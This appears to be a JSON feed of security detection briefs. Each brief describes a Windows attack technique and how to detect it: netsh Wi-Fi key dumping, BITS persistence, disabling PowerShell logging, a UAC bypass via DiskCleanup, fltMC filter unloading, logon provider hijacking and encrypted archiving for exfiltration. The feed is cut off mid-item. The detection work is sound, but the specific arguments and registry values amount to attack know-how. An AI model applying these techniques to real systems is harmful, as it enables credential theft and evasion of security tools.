{"description":"Trending threats, MITRE ATT\u0026CK coverage, and detection metadata — refreshed continuously.","feed_url":"https://feed.craftedsignal.io/products/defender-xdr/","home_page_url":"https://feed.craftedsignal.io/","items":[{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Defender XDR","Elastic Defend","Sysmon"],"_cs_severities":["high"],"_cs_tags":["credential-access","netsh","windows"],"_cs_type":"advisory","_cs_vendors":["Microsoft","Elastic","Crowdstrike","SentinelOne"],"content_html":"\u003cp\u003eAttackers often target wireless credentials to gain unauthorized network access. This involves using the legitimate Windows command-line tool \u003ccode\u003enetsh.exe\u003c/code\u003e to extract Wi-Fi passwords stored on a compromised system. By leveraging \u003ccode\u003enetsh\u003c/code\u003e, attackers can bypass traditional security measures and retrieve sensitive information without deploying custom malware. The technique involves specific command-line arguments that instruct \u003ccode\u003enetsh\u003c/code\u003e to display wireless keys in cleartext, exposing the network passwords. Defenders must monitor \u003ccode\u003enetsh\u003c/code\u003e command-line activity to identify potential credential access attempts. This activity can lead to lateral movement within the network.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker gains initial access to a Windows system (e.g., via phishing or exploiting a software vulnerability).\u003c/li\u003e\n\u003cli\u003eThe attacker executes \u003ccode\u003enetsh.exe\u003c/code\u003e with specific arguments to list available wireless profiles.\u003c/li\u003e\n\u003cli\u003eThe attacker identifies a target wireless profile from the list.\u003c/li\u003e\n\u003cli\u003eThe attacker executes \u003ccode\u003enetsh.exe\u003c/code\u003e again, this time specifying the target profile and requesting the key to be displayed in cleartext using the \u003ccode\u003ekey=clear\u003c/code\u003e argument.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eNetsh.exe\u003c/code\u003e retrieves the Wi-Fi password from the Windows Wireless LAN service.\u003c/li\u003e\n\u003cli\u003eThe password is displayed in the command output, which the attacker captures.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the obtained Wi-Fi password to connect to the wireless network.\u003c/li\u003e\n\u003cli\u003eThe attacker can now perform lateral movement and access internal resources.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful credential dumping allows attackers to gain unauthorized access to wireless networks. This can lead to lateral movement within the organization\u0026rsquo;s network, access to sensitive data, and further compromise of systems and resources. The impact includes potential data breaches, financial losses, and reputational damage. This technique allows attackers to bypass traditional network access controls.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eDetect Wireless Credential Dumping via Netsh\u003c/code\u003e to identify suspicious \u003ccode\u003enetsh.exe\u003c/code\u003e commands in your environment.\u003c/li\u003e\n\u003cli\u003eEnable Sysmon process creation logging to capture the \u003ccode\u003enetsh.exe\u003c/code\u003e command-line arguments.\u003c/li\u003e\n\u003cli\u003eInvestigate any alerts triggered by the Sigma rule, focusing on the process lineage and user context as outlined in the \u0026ldquo;Triage and analysis\u0026rdquo; section of the source.\u003c/li\u003e\n\u003cli\u003eImplement strong password policies for Wi-Fi networks, including the use of WPA2 or WPA3 encryption.\u003c/li\u003e\n\u003cli\u003eReview and restrict the use of \u003ccode\u003enetsh.exe\u003c/code\u003e on systems where it is not required, using application control solutions.\u003c/li\u003e\n\u003cli\u003eMonitor for related alerts indicating lateral movement, staging, remote access, or persistence, as mentioned in the \u0026ldquo;Triage and analysis\u0026rdquo; section of the source.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-30T12:00:00Z","date_published":"2024-01-30T12:00:00Z","id":"/briefs/2024-01-30-wireless-creds-dumping/","summary":"Adversaries use the Windows built-in utility Netsh to dump Wireless saved access keys in clear text, potentially leading to credential compromise.","title":"Wireless Credential Dumping via Netsh","url":"https://feed.craftedsignal.io/briefs/2024-01-30-wireless-creds-dumping/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Defender XDR","Elastic Defend","SentinelOne Cloud Funnel"],"_cs_severities":["medium"],"_cs_tags":["persistence","bits","windows"],"_cs_type":"advisory","_cs_vendors":["Microsoft","Elastic"],"content_html":"\u003cp\u003eThe Background Intelligent Transfer Service (BITS) is a Windows service used for asynchronous, prioritized, and throttled file transfers. Attackers can abuse BITS to establish persistence by using the \u003ccode\u003eSetNotifyCmdLine\u003c/code\u003e method to execute a program after a BITS job completes or enters a specific state. This technique allows adversaries to run arbitrary code with elevated privileges, bypassing traditional security measures. The detection rule identifies suspicious processes initiated by BITS, excluding known legitimate executables like \u003ccode\u003eWerFaultSecure.exe\u003c/code\u003e, \u003ccode\u003eWerFault.exe\u003c/code\u003e, \u003ccode\u003ewermgr.exe\u003c/code\u003e, and \u003ccode\u003edirectxdatabaseupdater.exe\u003c/code\u003e. This behavior can be employed to maintain access to a compromised system, even after a reboot or user logout. Defenders need to monitor BITS activity for unusual command-line executions to detect and prevent potential persistence attempts.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker gains initial access to a system through other means (e.g., phishing, exploitation of a vulnerability).\u003c/li\u003e\n\u003cli\u003eThe attacker uses the BITSAdmin tool or PowerShell cmdlets to create a new BITS job.\u003c/li\u003e\n\u003cli\u003eThe attacker configures the BITS job to download a malicious payload or execute a malicious script.\u003c/li\u003e\n\u003cli\u003eThe attacker utilizes the \u003ccode\u003eSetNotifyCmdLine\u003c/code\u003e method to set a command that will be executed upon job completion or a specified state change.\u003c/li\u003e\n\u003cli\u003eThe BITS service executes the specified command, which can be a script interpreter (e.g., \u003ccode\u003epowershell.exe\u003c/code\u003e, \u003ccode\u003ecmd.exe\u003c/code\u003e) or a malicious executable.\u003c/li\u003e\n\u003cli\u003eThe malicious command downloads or executes further payloads, establishing persistence on the system.\u003c/li\u003e\n\u003cli\u003eThe attacker maintains persistent access, allowing them to execute commands, steal data, or perform other malicious activities.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation allows attackers to maintain persistent access to compromised systems. This can lead to data theft, further malware deployment, or complete system compromise. The BITS service runs with elevated privileges, so any command executed via \u003ccode\u003eSetNotifyCmdLine\u003c/code\u003e will also run with those privileges. This persistence mechanism is difficult to detect because BITS is a legitimate Windows service, and its activity can be easily masked as normal system operations.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMonitor process creation events for processes spawned by \u003ccode\u003esvchost.exe\u003c/code\u003e with arguments containing \u0026ldquo;BITS\u0026rdquo; but not in the exclusion list (WerFaultSecure.exe, WerFault.exe, wermgr.exe, directxdatabaseupdater.exe) using the \u0026ldquo;Persistence via BITS Job Notify Cmdline\u0026rdquo; rule.\u003c/li\u003e\n\u003cli\u003eImplement the Sigma rule \u0026ldquo;Detect Suspicious BITS Job Creation\u0026rdquo; to identify unusual BITS job creation activities.\u003c/li\u003e\n\u003cli\u003eReview BITS job configurations on systems to identify and remove any unauthorized or suspicious jobs.\u003c/li\u003e\n\u003cli\u003eEnable Sysmon process creation logging to capture detailed information about process execution, including parent-child relationships and command-line arguments.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-26T10:00:00Z","date_published":"2024-01-26T10:00:00Z","id":"/briefs/2024-01-26-bits-persistence/","summary":"Adversaries can achieve persistence by abusing the Background Intelligent Transfer Service (BITS) SetNotifyCmdLine method to execute a program after a job finishes, leading to arbitrary code execution and system compromise.","title":"Persistence via BITS Job Notify Cmdline","url":"https://feed.craftedsignal.io/briefs/2024-01-26-bits-persistence/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Defender XDR","Cloud Endpoint","AutomationManagerAgent"],"_cs_severities":["medium"],"_cs_tags":["defense-evasion","powershell","registry"],"_cs_type":"advisory","_cs_vendors":["Microsoft","Trend Micro","N-able"],"content_html":"\u003cp\u003eAttackers frequently disable PowerShell Script Block Logging to evade detection and hide malicious activities on compromised systems. By modifying the \u003ccode\u003eEnableScriptBlockLogging\u003c/code\u003e registry value to \u0026lsquo;0\u0026rsquo; or \u0026lsquo;0x00000000\u0026rsquo;, adversaries can significantly reduce the visibility into their PowerShell-based attacks. This technique is particularly effective when followed by script-driven activity, making it harder for security teams to identify and respond to threats. This behavior has been observed across multiple environments, including those utilizing endpoint detection and response solutions such as Elastic Defend, Microsoft Defender XDR, SentinelOne, and CrowdStrike. The rule was last updated on 2026-05-04 and is designed to detect these specific registry modifications.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003e\u003cstrong\u003eInitial Access:\u003c/strong\u003e An attacker gains initial access to a Windows system, possibly through phishing or exploitation of a vulnerability.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003ePrivilege Escalation:\u003c/strong\u003e The attacker may attempt to escalate privileges to gain necessary permissions to modify the registry.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eDefense Evasion:\u003c/strong\u003e The attacker modifies the registry to disable PowerShell Script Block Logging by setting \u003ccode\u003eHKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\\EnableScriptBlockLogging\u003c/code\u003e to 0 or 0x00000000 using \u003ccode\u003ereg.exe\u003c/code\u003e or PowerShell itself.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eExecution:\u003c/strong\u003e The attacker executes malicious PowerShell scripts, leveraging the disabled logging to avoid detection. These scripts may be used for reconnaissance, lateral movement, or data exfiltration.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003ePersistence:\u003c/strong\u003e The attacker establishes persistence using various techniques, such as creating scheduled tasks or modifying registry keys to ensure continued access to the system.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eCommand and Control:\u003c/strong\u003e The attacker establishes a command and control channel to communicate with the compromised system and issue further instructions.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eLateral Movement:\u003c/strong\u003e The attacker moves laterally to other systems on the network, compromising additional assets.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eImpact:\u003c/strong\u003e The attacker achieves their final objective, such as data theft, ransomware deployment, or disruption of services.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful disabling of PowerShell Script Block Logging can severely hinder incident response efforts, allowing attackers to operate undetected for extended periods. Organizations may experience data breaches, financial losses, and reputational damage. The impact can be widespread as attackers leverage compromised systems for lateral movement and further exploitation. The loss of PowerShell logging can blind security teams, making it difficult to reconstruct attacker actions and contain the breach.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003ePowerShell_Script_Block_Logging_Disabled\u003c/code\u003e to your SIEM to detect registry modifications that disable PowerShell Script Block Logging.\u003c/li\u003e\n\u003cli\u003eMonitor registry events for changes to the \u003ccode\u003eEnableScriptBlockLogging\u003c/code\u003e value, focusing on events with \u003ccode\u003eregistry.data.strings\u003c/code\u003e set to \u0026ldquo;0\u0026rdquo; or \u0026ldquo;0x00000000\u0026rdquo; (see rule \u003ccode\u003ePowerShell_Script_Block_Logging_Disabled\u003c/code\u003e).\u003c/li\u003e\n\u003cli\u003eEnable Sysmon registry event logging to capture the necessary data for the Sigma rules to function effectively (see references).\u003c/li\u003e\n\u003cli\u003eReview and harden PowerShell execution policies to prevent unauthorized script execution (related to tactic TA0005).\u003c/li\u003e\n\u003cli\u003eImplement strict access controls to limit who can modify registry settings related to PowerShell logging (related to tactic TA0005).\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-09T10:00:00Z","date_published":"2024-01-09T10:00:00Z","id":"/briefs/2024-01-09-disable-powershell-scriptblock-logging/","summary":"Attackers may disable PowerShell Script Block Logging by modifying the registry to conceal their activities on the host and evade detection by setting the `EnableScriptBlockLogging` registry value to 0, impacting security monitoring and incident response capabilities.","title":"PowerShell Script Block Logging Disabled via Registry Modification","url":"https://feed.craftedsignal.io/briefs/2024-01-09-disable-powershell-scriptblock-logging/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Defender XDR","Elastic Defend"],"_cs_severities":["medium"],"_cs_tags":["uac-bypass","privilege-escalation","windows","diskcleanup","scheduled-task"],"_cs_type":"advisory","_cs_vendors":["Microsoft","Elastic","Crowdstrike","SentinelOne"],"content_html":"\u003cp\u003eThis rule identifies User Account Control (UAC) bypass attempts via hijacking the DiskCleanup Scheduled Task. Attackers exploit this method to execute code with elevated privileges, bypassing standard security controls. The technique involves leveraging the \u003ccode\u003ecleanmgr.exe\u003c/code\u003e or \u003ccode\u003etaskhostw.exe\u003c/code\u003e executables with specific arguments (\u003ccode\u003e/autoclean\u003c/code\u003e and \u003ccode\u003e/d\u003c/code\u003e) outside of their expected paths. This allows attackers to run malicious code under the guise of a legitimate system process, making detection more challenging. This technique is used to gain elevated privileges on a compromised system, allowing for further malicious activities.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker gains initial access to the system (e.g., via phishing or exploiting a software vulnerability).\u003c/li\u003e\n\u003cli\u003eThe attacker modifies or creates a scheduled task to execute \u003ccode\u003ecleanmgr.exe\u003c/code\u003e or \u003ccode\u003etaskhostw.exe\u003c/code\u003e with the \u003ccode\u003e/autoclean\u003c/code\u003e and \u003ccode\u003e/d\u003c/code\u003e arguments.\u003c/li\u003e\n\u003cli\u003eThe modified scheduled task is triggered, executing the specified executable with the supplied arguments.\u003c/li\u003e\n\u003cli\u003eThe executable, such as \u003ccode\u003ecleanmgr.exe\u003c/code\u003e, attempts to run Disk Cleanup.\u003c/li\u003e\n\u003cli\u003eIf the executable path is outside the standard locations (e.g., \u003ccode\u003eC:\\\\Windows\\\\System32\u003c/code\u003e or \u003ccode\u003eC:\\\\Windows\\\\SysWOW64\u003c/code\u003e), it indicates a potential hijack.\u003c/li\u003e\n\u003cli\u003eMalicious code is executed with elevated privileges due to the UAC bypass.\u003c/li\u003e\n\u003cli\u003eThe attacker uses these elevated privileges to install malware, modify system settings, or perform other malicious activities.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation allows attackers to bypass User Account Control (UAC) and execute code with elevated privileges. This can lead to the installation of malware, modification of system settings, data theft, and other malicious activities. While the exact number of victims is unknown, this technique is effective on systems where UAC is enabled but misconfigured or vulnerable.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;UAC Bypass via DiskCleanup with Suspicious Path\u0026rdquo; to your SIEM and tune for your environment to detect UAC bypass attempts.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;UAC Bypass via DiskCleanup and Taskhostw\u0026rdquo; to your SIEM to detect UAC bypass attempts.\u003c/li\u003e\n\u003cli\u003eMonitor process creation events for \u003ccode\u003ecleanmgr.exe\u003c/code\u003e and \u003ccode\u003etaskhostw.exe\u003c/code\u003e with the \u003ccode\u003e/autoclean\u003c/code\u003e and \u003ccode\u003e/d\u003c/code\u003e arguments, focusing on executions outside the standard system directories.\u003c/li\u003e\n\u003cli\u003eReview and harden scheduled tasks to prevent unauthorized modifications.\u003c/li\u003e\n\u003cli\u003eEnsure that UAC settings are properly configured and enforced across the organization.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-04T12:00:00Z","date_published":"2024-01-04T12:00:00Z","id":"/briefs/2024-01-uac-bypass-diskcleanup/","summary":"Attackers bypass User Account Control (UAC) by hijacking the DiskCleanup Scheduled Task to stealthily execute code with elevated permissions on Windows systems.","title":"UAC Bypass via DiskCleanup Scheduled Task Hijack","url":"https://feed.craftedsignal.io/briefs/2024-01-uac-bypass-diskcleanup/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Windows","Defender XDR","SentinelOne Cloud Funnel"],"_cs_severities":["medium"],"_cs_tags":["defense-evasion","windows","masquerading"],"_cs_type":"advisory","_cs_vendors":["Microsoft","Intel","IBM"],"content_html":"\u003cp\u003eThis detection identifies process execution from suspicious default Windows directories. Attackers may hide malware in trusted paths to evade defenses, making it difficult for analysts to distinguish between legitimate and malicious activity. The detection focuses on identifying processes running from directories like C:\\PerfLogs, C:\\Users\\Public, and various Windows subdirectories (e.g., C:\\Windows\\Tasks, C:\\Windows\\AppReadiness), where executable files are not typically expected to reside. The detection excludes known legitimate processes like SpeechUXWiz.exe, SystemSettings.exe, TrustedInstaller.exe and other Intel and IBM executables to reduce false positives. This technique is often used to bypass security controls or take advantage of existing exceptions applied to these directories. This activity was observed being used by threat actors in the Siestagraph campaign.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker gains initial access to the system (e.g., through phishing or exploiting a vulnerability).\u003c/li\u003e\n\u003cli\u003eThe attacker drops a malicious executable into a suspicious directory like C:\\Users\\Public or C:\\Windows\\Tasks.\u003c/li\u003e\n\u003cli\u003eThe attacker executes the malware from the unusual directory. This might be achieved using \u003ccode\u003ecmd.exe\u003c/code\u003e or \u003ccode\u003epowershell.exe\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe executed malware establishes persistence by creating a scheduled task or modifying registry keys.\u003c/li\u003e\n\u003cli\u003eThe malware connects to a command-and-control (C2) server to receive further instructions.\u003c/li\u003e\n\u003cli\u003eThe C2 server instructs the malware to perform reconnaissance on the network.\u003c/li\u003e\n\u003cli\u003eThe malware attempts to move laterally to other systems on the network using techniques like pass-the-hash or exploiting vulnerabilities.\u003c/li\u003e\n\u003cli\u003eThe attacker achieves their objective, such as data exfiltration, ransomware deployment, or establishing long-term access to the network.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation can lead to the execution of arbitrary code, persistence on the system, and further compromise of the network. Attackers can use this technique to bypass security controls and evade detection, potentially leading to data breaches, financial loss, or disruption of services. While the rule itself has a medium severity, the impact of a successful attack using this technique can be severe, depending on the attacker\u0026rsquo;s objectives and the compromised data.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Process Execution from Unusual Directory\u0026rdquo; to your SIEM and tune for your environment to detect suspicious process execution.\u003c/li\u003e\n\u003cli\u003eInvestigate any alerts generated by the Sigma rule to determine if the process execution is legitimate or malicious.\u003c/li\u003e\n\u003cli\u003eEnable process creation logging, specifically Event ID 4688 with command line process auditing, to ensure the Sigma rule has the necessary data to function effectively.\u003c/li\u003e\n\u003cli\u003eReview and harden permissions on the listed suspicious directories to prevent unauthorized file creation and execution.\u003c/li\u003e\n\u003cli\u003eBlock execution of unsigned or untrusted executables from these directories using application control solutions.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-04T12:00:00Z","date_published":"2024-01-04T12:00:00Z","id":"/briefs/2024-01-process-execution-from-unusual-directory/","summary":"Adversaries may execute processes from unusual default Windows directories to masquerade malware and evade defenses by blending in with trusted paths, making malicious activity harder to detect.","title":"Process Execution from Suspicious Windows Directories","url":"https://feed.craftedsignal.io/briefs/2024-01-process-execution-from-unusual-directory/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Defender XDR","Endpoint Security","UEMS_Agent","SentinelOne Cloud Funnel"],"_cs_severities":["medium"],"_cs_tags":["defense-evasion","filter-driver","fltMC.exe","windows"],"_cs_type":"advisory","_cs_vendors":["Microsoft","ManageEngine","Bitdefender","SentinelOne"],"content_html":"\u003cp\u003eThe Filter Manager Control Program (fltMC.exe) is a Windows utility used to manage filter drivers, also known as minifilters. These minifilters are leveraged by various security products, including EDR, antivirus solutions, and data loss prevention tools, to intercept and modify I/O requests. Attackers can abuse fltMC.exe to unload these minifilters, effectively disabling or circumventing the security measures they provide. This allows malicious actors to operate without detection, potentially leading to data breaches, malware infections, or other harmful activities. This technique has been observed being used to disable security products such as Bitdefender, SentinelOne and ManageEngine Endpoint Central.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAttacker gains initial access to the target system (e.g., via compromised credentials or exploit).\u003c/li\u003e\n\u003cli\u003eAttacker executes \u003ccode\u003efltMC.exe\u003c/code\u003e with administrative privileges.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003efltMC.exe\u003c/code\u003e attempts to unload a specific filter driver (minifilter).\u003c/li\u003e\n\u003cli\u003eThe operating system processes the request to unload the specified filter driver.\u003c/li\u003e\n\u003cli\u003eIf successful, the targeted minifilter is removed from the active filter stack.\u003c/li\u003e\n\u003cli\u003eSecurity software relying on the unloaded minifilter ceases to function correctly, leaving a security gap.\u003c/li\u003e\n\u003cli\u003eAttacker performs malicious actions, such as deploying malware or exfiltrating sensitive data, without the protection of the disabled filter driver.\u003c/li\u003e\n\u003cli\u003eAttacker achieves their objective, such as data theft or system compromise.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation allows attackers to disable or circumvent security controls, increasing the likelihood of successful malware infections, data breaches, and other malicious activities. The scope of impact depends on the specific filter driver unloaded and the security products it supports. Disabling a critical EDR minifilter could leave the entire system vulnerable, while disabling a less critical filter might only impact a subset of security features.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMonitor process creation events for the execution of \u003ccode\u003efltMC.exe\u003c/code\u003e with the \u003ccode\u003eunload\u003c/code\u003e argument to identify potential evasion attempts (see Sigma rule \u0026ldquo;Potential Evasion via Filter Manager\u0026rdquo;).\u003c/li\u003e\n\u003cli\u003eInvestigate any instances of \u003ccode\u003efltMC.exe\u003c/code\u003e execution where the parent process is not a known and trusted system management tool.\u003c/li\u003e\n\u003cli\u003eImplement strict access controls to limit the ability of users to execute \u003ccode\u003efltMC.exe\u003c/code\u003e or modify filter driver configurations.\u003c/li\u003e\n\u003cli\u003eReview the list of exclusions in the provided EQL query to identify any legitimate software that may be generating false positives.\u003c/li\u003e\n\u003cli\u003eEnsure that endpoint security solutions are properly configured and monitored to detect and prevent unauthorized filter driver modifications.\u003c/li\u003e\n\u003cli\u003eEnable Sysmon process creation logging to activate the rules above.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T14:00:00Z","date_published":"2024-01-03T14:00:00Z","id":"/briefs/2024-01-filter-manager-evasion/","summary":"Adversaries may abuse the Filter Manager Control Program (fltMC.exe) to unload filter drivers, thereby evading security software defenses such as malware detection and file system monitoring.","title":"Potential Defense Evasion via Filter Manager (fltMC.exe)","url":"https://feed.craftedsignal.io/briefs/2024-01-filter-manager-evasion/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Defender XDR","ICA Client","SARemediation","Endpoint Connect"],"_cs_severities":["medium"],"_cs_tags":["credential-access","persistence","registry-modification"],"_cs_type":"advisory","_cs_vendors":["Microsoft","Citrix","Dell","CheckPoint"],"content_html":"\u003cp\u003eAttackers may modify the network logon provider registry to gain persistence or access credentials. This involves registering a rogue network logon provider module that intercepts authentication credentials in clear text during user logon. The modification of the ProviderPath key under the NetworkProvider service registry path can be indicative of this malicious activity. The registry modification is often performed by non-system accounts and the adversary will attempt to hide the malicious DLL by placing it in common directories. This technique allows adversaries to steal user credentials or maintain persistent access to the compromised system.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker gains initial access to a Windows system, possibly through exploiting a vulnerability or using compromised credentials.\u003c/li\u003e\n\u003cli\u003eThe attacker elevates privileges to obtain the necessary permissions to modify the registry.\u003c/li\u003e\n\u003cli\u003eThe attacker locates the registry key related to network logon providers: \u003ccode\u003eHKLM\\SYSTEM\\CurrentControlSet\\Services\\*\\NetworkProvider\\ProviderPath\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe attacker modifies the \u003ccode\u003eProviderPath\u003c/code\u003e registry value to point to a malicious DLL.\u003c/li\u003e\n\u003cli\u003eThe system loads the malicious DLL during the logon process.\u003c/li\u003e\n\u003cli\u003eThe malicious DLL intercepts user credentials in clear text.\u003c/li\u003e\n\u003cli\u003eThe attacker harvests the intercepted credentials.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the harvested credentials for lateral movement or further exploitation of the network.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eA successful attack can lead to the compromise of user credentials, allowing attackers to gain unauthorized access to sensitive systems and data. Modification of the network logon provider registry enables attackers to maintain persistent access to the compromised system, even after a reboot. This can result in data breaches, financial losses, and reputational damage. The severity depends on the level of access granted to the compromised accounts and the sensitivity of the data they can access.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMonitor registry modifications to the \u003ccode\u003eHKLM\\SYSTEM\\CurrentControlSet\\Services\\*\\NetworkProvider\\ProviderPath\u003c/code\u003e key, using the provided Sigma rule to detect suspicious changes.\u003c/li\u003e\n\u003cli\u003eEnable Sysmon registry event logging to capture registry modifications.\u003c/li\u003e\n\u003cli\u003eRegularly audit network logon providers and verify the integrity and authenticity of the registered DLLs.\u003c/li\u003e\n\u003cli\u003eInvestigate processes modifying the registry and their associated file creation events for unknown or suspicious processes.\u003c/li\u003e\n\u003cli\u003eBlock execution of unsigned or untrusted DLLs in the network logon provider path.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Network Logon Provider Registry Modification\u0026rdquo; to your SIEM and tune for your environment.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T12:00:00Z","date_published":"2024-01-03T12:00:00Z","id":"/briefs/2024-01-network-logon-provider-modification/","summary":"Adversaries may modify the network logon provider registry to register a rogue network logon provider module for persistence and credential access by intercepting authentication credentials in clear text during user logon.","title":"Network Logon Provider Registry Modification","url":"https://feed.craftedsignal.io/briefs/2024-01-network-logon-provider-modification/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Defender XDR","Elastic Defend","Sysmon"],"_cs_severities":["medium"],"_cs_tags":["collection","archive","exfiltration","windows"],"_cs_type":"advisory","_cs_vendors":["Microsoft","Elastic"],"content_html":"\u003cp\u003eAttackers frequently compress and encrypt data before exfiltration to reduce the amount of data being sent over the network and to obfuscate the contents. This behavior often indicates a later stage of intrusion where the attacker has already collected sensitive data and is preparing to move it out of the environment. The use of archiving tools like WinRAR and 7-Zip with encryption flags can help attackers to hide their activities, making it more difficult for defenders to identify and respond to data theft. This technique has been observed in multiple threat actors including Turla as documented by WeLiveSecurity. This brief focuses on detecting command-line activity indicative of archive creation with encryption using WinRAR or 7-Zip on Windows systems.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003e\u003cstrong\u003eInitial Access:\u003c/strong\u003e The attacker gains initial access to the system through methods such as phishing, exploiting vulnerabilities, or using stolen credentials.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eCredential Access:\u003c/strong\u003e The attacker attempts to obtain credentials using techniques such as Mimikatz or credential dumping.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eDiscovery:\u003c/strong\u003e The attacker performs reconnaissance to identify sensitive data and systems of interest.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eData Collection:\u003c/strong\u003e The attacker gathers sensitive data from various locations on the compromised system or network.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eArchive Creation:\u003c/strong\u003e The attacker uses WinRAR or 7-Zip to create an encrypted archive of the collected data using command-line arguments like \u003ccode\u003e-hp\u003c/code\u003e, \u003ccode\u003e-p\u003c/code\u003e, \u003ccode\u003e/hp\u003c/code\u003e, or \u003ccode\u003e/p\u003c/code\u003e with \u003ccode\u003erar.exe\u003c/code\u003e or \u003ccode\u003eWinRAR.exe\u003c/code\u003e or \u003ccode\u003e-p*\u003c/code\u003e with \u003ccode\u003e7z.exe\u003c/code\u003e or \u003ccode\u003e7za.exe\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eData Staging:\u003c/strong\u003e The encrypted archive is moved to a staging location, such as a temporary directory or removable media.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eExfiltration:\u003c/strong\u003e The attacker exfiltrates the encrypted archive from the network using various methods, such as FTP, SCP, or cloud storage services.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eCovering Tracks:\u003c/strong\u003e The attacker deletes the archive from the staging location to remove evidence of the activity.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eA successful attack can lead to the exfiltration of sensitive data, including personally identifiable information (PII), financial records, 